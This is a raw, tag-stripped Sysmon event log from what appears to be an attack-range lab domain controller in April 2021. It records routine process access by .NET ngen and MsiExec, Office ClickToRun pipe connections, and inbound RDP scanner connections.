14:58:03.701{A7A01FEF-EBFB-607E-090E-00000000BB01}49526624C:\Windows\syswow64\MsiExec.exe{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400C:\Windows\system32\msiexec.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\syswow64\MsiExec.exe+7291|C:\Windows\syswow64\MsiExec.exe+7873|C:\Windows\syswow64\MsiExec.exe+9201|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000077782Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.686{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBFB-607E-0E0E-00000000BB01}5640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077781Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.686{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBFB-607E-0E0E-00000000BB01}5640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 18141800x800000000000000077780Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.670{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077779Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.670{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077778Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.670{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077777Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.670{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077776Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.654{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBFB-607E-090E-00000000BB01}4952C:\Windows\syswow64\MsiExec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000077775Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.654{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077774Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.654{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077773Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.654{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077772Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.654{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077771Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.654{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077770Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.654{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077769Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.654{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077768Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.623{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBFB-607E-0D0E-00000000BB01}5456C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000077767Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.623{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077766Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.607{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBFB-607E-0D0E-00000000BB01}5456C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077765Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.607{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBFB-607E-0D0E-00000000BB01}5456C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 18141800x800000000000000077764Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.607{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077763Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.607{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077762Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.607{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077761Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.561{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBFB-607E-0C0E-00000000BB01}3212C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077760Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.545{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBFB-607E-0C0E-00000000BB01}3212C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077759Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.545{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBFB-607E-0C0E-00000000BB01}3212C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 354300x800000000000000077758Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.254{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-2223-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000077757Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.159{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com58825-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000077756Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:02.129{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57546-false10.0.1.12-8000- 354300x800000000000000077755Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:01.705{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com60747-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000077754Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.498{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBFB-607E-0B0E-00000000BB01}3376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077753Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.482{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBFB-607E-0B0E-00000000BB01}3376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077752Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.482{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBFB-607E-0B0E-00000000BB01}3376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 18141800x800000000000000077751Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.482{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000077750Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.451{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBFB-607E-0A0E-00000000BB01}6948C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000077749Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.436{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBFB-607E-0A0E-00000000BB01}6948C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000077748Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:03.436{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBFB-607E-0A0E-00000000BB01}6948C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 18141800x800000000000000077747Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.404{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077746Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.404{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077745Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.404{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077744Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.404{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077743Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.389{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077742Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.389{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077741Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.389{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077740Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.389{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077739Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:03.389{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000077738Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 